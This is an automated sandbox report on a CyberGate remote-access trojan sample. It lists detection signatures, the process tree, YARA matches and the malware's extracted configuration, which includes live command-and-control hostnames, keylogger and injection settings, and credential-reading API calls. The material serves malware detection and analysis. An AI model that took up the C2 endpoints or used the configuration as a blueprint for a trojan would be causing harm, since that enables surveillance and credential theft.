Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report dqH3t8JU1x.exe

Overview

General Information

Sample Name:dqH3t8JU1x.exe
Analysis ID:388215
MD5:06e21af52a3e3e5173a6a53725b1c217
SHA1:273760ea9b8cf2b4e60e48ed7ea96ab92bb3fa1d
SHA256:61c2d5a213f1b68ef98f2800f02697650ccf28eb38ec07635f0bffcdf18a803a
Tags:Cybergateexe
Infos:

Most interesting Screenshot:

Detection

CyberGate
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected CyberGate RAT
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contain functionality to detect virtual machines
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Contains functionality to register a low level keyboard hook
Creates a thread in another existing process (thread injection)
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Drops executables to the windows directory (C:\Windows) and starts them
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Startup

  • System is w10x64
  • dqH3t8JU1x.exe (PID: 6776 cmdline: 'C:\Users\user\Desktop\dqH3t8JU1x.exe' MD5: 06E21AF52A3E3E5173A6A53725B1C217)
    • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • TEXTURAFIVEM.exe (PID: 6984 cmdline: 'C:\Windows\install\TEXTURAFIVEM.exe' MD5: 06E21AF52A3E3E5173A6A53725B1C217)
        • explorer.exe (PID: 2200 cmdline: explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • TEXTURAFIVEM.exe (PID: 5432 cmdline: 'C:\Windows\install\TEXTURAFIVEM.exe' MD5: 06E21AF52A3E3E5173A6A53725B1C217)
            • WerFault.exe (PID: 6740 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 620 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • TEXTURAFIVEM.exe (PID: 7096 cmdline: 'C:\Windows\install\TEXTURAFIVEM.exe' MD5: 06E21AF52A3E3E5173A6A53725B1C217)
        • explorer.exe (PID: 1768 cmdline: explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • WerFault.exe (PID: 5856 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1768 -s 1104 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • TEXTURAFIVEM.exe (PID: 4024 cmdline: 'C:\Windows\install\TEXTURAFIVEM.exe' MD5: 06E21AF52A3E3E5173A6A53725B1C217)
        • explorer.exe (PID: 4908 cmdline: explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • WerFault.exe (PID: 5968 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1112 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • explorer.exe (PID: 5908 cmdline: explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • WerFault.exe (PID: 6872 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5908 -s 1104 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: CyberGate

{"C2 list": ["eduzao.ddns.net:7000", "eduzao.ddns.net:2020", "eduzao.ddns.net:2200", "eduzao.ddns.net:4400"], "Password": "123", "InstallFlag": "TRUE", "InstallDir": "install", "InstallFileName": "TEXTURAFIVEM.exe", "ActiveXStartup": "{08B0E5JF-4FCB-11CF-AAA5-00401C6XX500}", "REGKeyHKLM": "HKLM", "REGKeyHKCU": "HKCU", "EnableMessageBox": "TRUE", "MessageBoxIcon": "16", "MessageBoxButton": "0", "InstallMessageTitle": "TEXTURAFIVEM", "InstallMessage": "ESSE ARQUIVO NAO PODE SER EXECUTADO", "ActivateKeylogger": "TRUE", "KeyloggerBackspace": "TRUE", "KeyloggerEnableFTP": "FALSE", "FTPAddress": "ftp.server.com", "FTPDirectory": "./logs/", "FTPUserName": "ftp_user", "FTPPort": "21", "FTPInterval": "30", "ProcessInjection": "2", "ProcessNameForInjection": "explorer.exe", "Persistance": "FALSE", "HideFile": "FALSE", "ChangeCreationDate": "FALSE", "Mutex": "***MUTEX***", "MeltFile": "TRUE", "CyberGateVersion": "2.6", "StartupPolicies": "Policies", "USBSpread": "FALSE"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmpMalware_QA_updateVT Research QA uploaded malware - file update.exeFlorian Roth
  • 0x140f8:$s3: BTMemoryLoadLibary: Get DLLEntyPoint failed
  • 0x73fc:$s5: \Internet Explorer\iexplore.exe
  • 0x142a8:$s7: BTMemoryGetProcAddress: DLL doesn't export anything
00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmpMalware_QA_updateVT Research QA uploaded malware - file update.exeFlorian Roth
  • 0x140f8:$s3: BTMemoryLoadLibary: Get DLLEntyPoint failed
  • 0x73fc:$s5: \Internet Explorer\iexplore.exe
  • 0x142a8:$s7: BTMemoryGetProcAddress: DLL doesn't export anything
00000019.00000002.587702834.0000000000401000.00000040.00020000.sdmpJoeSecurity_CyberGateYara detected CyberGate RATJoe Security
    00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmpJoeSecurity_CyberGateYara detected CyberGate RATJoe Security
      00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        Click to see the 16 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        20.2.explorer.exe.24010000.6.unpackMalware_QA_updateVT Research QA uploaded malware - file update.exeFlorian Roth
        • 0x140f8:$s3: BTMemoryLoadLibary: Get DLLEntyPoint failed
        • 0x73fc:$s5: \Internet Explorer\iexplore.exe
        • 0x142a8:$s7: BTMemoryGetProcAddress: DLL doesn't export anything
        20.2.explorer.exe.24010000.6.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          25.2.TEXTURAFIVEM.exe.400000.0.unpackRAT_CyberGateDetects CyberGate RATKevin Breen <kevin@techanarchy.net>
          • 0x15ef6:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
          • 0x15f97:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
          • 0x15ffa:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
          • 0x16007:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
          • 0x1608a:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
          • 0x160c1:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
          • 0x160ce:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
          • 0x160db:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
          • 0x160e8:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
          • 0x160f5:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
          • 0x16102:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
          • 0x1610f:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
          • 0x1611c:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
          • 0x16186:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
          • 0x16014:$string2: 23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23
          • 0x16097:$string2: 23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23
          • 0x160a5:$string2: 23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23
          • 0x160b3:$string2: 23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23
          • 0x16148:$string2: 23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23
          • 0x16156:$string2: 23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23
          • 0x16164:$string2: 23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23
          25.2.TEXTURAFIVEM.exe.400000.0.unpackJoeSecurity_CyberGateYara detected CyberGate RATJoe Security
            25.2.TEXTURAFIVEM.exe.400000.0.unpackCyberGateunknown Kevin Breen <kevin@techanarchy.net>
            • 0x15ef6:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
            • 0x15f97:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
            • 0x15ffa:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
            • 0x16007:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
            • 0x1608a:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
            • 0x160c1:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
            • 0x160ce:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
            • 0x160db:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
            • 0x160e8:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
            • 0x160f5:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
            • 0x16102:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
            • 0x1610f:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
            • 0x1611c:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
            • 0x16186:$string1: 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23
            • 0x16014:$string2: 23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23
            • 0x16097:$string2: 23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23
            • 0x160a5:$string2: 23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23
            • 0x160b3:$string2: 23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23
            • 0x16148:$string2: 23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23
            • 0x16156:$string2: 23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23
            • 0x16164:$string2: 23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23
            Click to see the 22 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: dqH3t8JU1x.exeAvira: detected
            Antivirus detection for dropped fileShow sources
            Source: C:\Windows\install\TEXTURAFIVEM.exeAvira: detection malicious, Label: WORM/Rebhip.V
            Found malware configurationShow sources
            Source: 25.2.TEXTURAFIVEM.exe.400000.0.unpackMalware Configuration Extractor: CyberGate {"C2 list": ["eduzao.ddns.net:7000", "eduzao.ddns.net:2020", "eduzao.ddns.net:2200", "eduzao.ddns.net:4400"], "Password": "123", "InstallFlag": "TRUE", "InstallDir": "install", "InstallFileName": "TEXTURAFIVEM.exe", "ActiveXStartup": "{08B0E5JF-4FCB-11CF-AAA5-00401C6XX500}", "REGKeyHKLM": "HKLM", "REGKeyHKCU": "HKCU", "EnableMessageBox": "TRUE", "MessageBoxIcon": "16", "MessageBoxButton": "0", "InstallMessageTitle": "TEXTURAFIVEM", "InstallMessage": "ESSE ARQUIVO NAO PODE SER EXECUTADO", "ActivateKeylogger": "TRUE", "KeyloggerBackspace": "TRUE", "KeyloggerEnableFTP": "FALSE", "FTPAddress": "ftp.server.com", "FTPDirectory": "./logs/", "FTPUserName": "ftp_user", "FTPPort": "21", "FTPInterval": "30", "ProcessInjection": "2", "ProcessNameForInjection": "explorer.exe", "Persistance": "FALSE", "HideFile": "FALSE", "ChangeCreationDate": "FALSE", "Mutex": "***MUTEX***", "MeltFile": "TRUE", "CyberGateVersion": "2.6", "StartupPolicies": "Policies", "USBSpread": "FALSE"}
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Windows\install\TEXTURAFIVEM.exeReversingLabs: Detection: 100%
            Multi AV Scanner detection for submitted fileShow sources
            Source: dqH3t8JU1x.exeVirustotal: Detection: 90%Perma Link
            Source: dqH3t8JU1x.exeReversingLabs: Detection: 100%
            Machine Learning detection for dropped fileShow sources
            Source: C:\Windows\install\TEXTURAFIVEM.exeJoe Sandbox ML: detected
            Machine Learning detection for sampleShow sources
            Source: dqH3t8JU1x.exeJoe Sandbox ML: detected
            Source: 25.2.TEXTURAFIVEM.exe.400000.0.unpackAvira: Label: WORM/Rebhip.Y
            Source: 1.2.dqH3t8JU1x.exe.400000.0.unpackAvira: Label: WORM/Rebhip.Y
            Source: 5.0.TEXTURAFIVEM.exe.400000.0.unpackAvira: Label: WORM/Rebhip.V
            Source: 25.0.TEXTURAFIVEM.exe.400000.0.unpackAvira: Label: WORM/Rebhip.V
            Source: 4.2.TEXTURAFIVEM.exe.400000.0.unpackAvira: Label: WORM/Rebhip.Y
            Source: 1.0.dqH3t8JU1x.exe.400000.0.unpackAvira: Label: WORM/Rebhip.V
            Source: 4.0.TEXTURAFIVEM.exe.400000.0.unpackAvira: Label: WORM/Rebhip.V
            Source: 5.2.TEXTURAFIVEM.exe.400000.0.unpackAvira: Label: WORM/Rebhip.Y
            Source: 9.2.TEXTURAFIVEM.exe.400000.0.unpackAvira: Label: WORM/Rebhip.Y
            Source: 9.0.TEXTURAFIVEM.exe.400000.0.unpackAvira: Label: WORM/Rebhip.V
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00408AD5 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,1_2_00408AD5
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00408AF8 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,1_2_00408AF8
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_0040930B CredEnumerateA,CryptUnprotectData,1_2_0040930B
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_0040930C CredEnumerateA,CryptUnprotectData,1_2_0040930C
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00408E58 RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,CryptUnprotectData,RegEnumValueA,RegCloseKey,1_2_00408E58
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 4_2_00408AD5 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,4_2_00408AD5
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 4_2_00408AF8 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,4_2_00408AF8
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 4_2_0040930B CredEnumerateA,CryptUnprotectData,4_2_0040930B
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 4_2_0040930C CredEnumerateA,CryptUnprotectData,4_2_0040930C
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 4_2_00408E58 RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,CryptUnprotectData,RegEnumValueA,RegCloseKey,4_2_00408E58
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 5_2_00408AD5 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,5_2_00408AD5
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 5_2_00408AF8 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,5_2_00408AF8
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 5_2_0040930B CredEnumerateA,CryptUnprotectData,5_2_0040930B
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 5_2_0040930C CredEnumerateA,CryptUnprotectData,5_2_0040930C
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 5_2_00408E58 RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,CryptUnprotectData,RegEnumValueA,RegCloseKey,5_2_00408E58
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 9_2_00408AD5 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,9_2_00408AD5
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 9_2_00408AF8 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,9_2_00408AF8
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 9_2_0040930B CredEnumerateA,CryptUnprotectData,9_2_0040930B
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 9_2_0040930C CredEnumerateA,CryptUnprotectData,9_2_0040930C
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 9_2_00408E58 RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,CryptUnprotectData,RegEnumValueA,RegCloseKey,9_2_00408E58
            Source: dqH3t8JU1x.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
            Source: Binary string: msacm32.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: RmClient.pdb= source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: msvfw32.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001C.00000003.530664291.0000000004FCE000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555588364.00000000056E0000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.553818944.0000000000BCA000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587851693.0000000003400000.00000004.00000040.sdmp
            Source: Binary string: pstorec.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001C.00000003.540622242.00000000053E1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555588364.00000000056E0000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.572284230.0000000005060000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587851693.0000000003400000.00000004.00000040.sdmp
            Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001C.00000003.530712712.00000000031F1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555588364.00000000056E0000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.572284230.0000000005060000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587851693.0000000003400000.00000004.00000040.sdmp
            Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: SettingSyncCore.pdbd source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: rasapi32.pdbhr source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555588364.00000000056E0000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.572284230.0000000005060000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587851693.0000000003400000.00000004.00000040.sdmp
            Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: mpr.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wuser32.pdbe source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: avicap32.pdbq source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: shell32.pdb{ source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: ntmarta.pdbc source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: shell32.pdbp source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: ole32.pdbk source: WerFault.exe, 0000001C.00000003.540622242.00000000053E1000.00000004.00000040.sdmp
            Source: Binary string: WINMMBASE.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: dwmapi.pdbw source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.358325341.0000000007AA0000.00000002.00000001.sdmp
            Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: fltLib.pdb|r# source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 0000001C.00000003.540622242.00000000053E1000.00000004.00000040.sdmp
            Source: Binary string: oleaut32.pdbzr- source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: winmm.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: KiUserCallbackDispatcherRSDSwntdll.pdb source: WerFault.exe, 00000025.00000002.603618013.0000000000C12000.00000004.00000001.sdmp
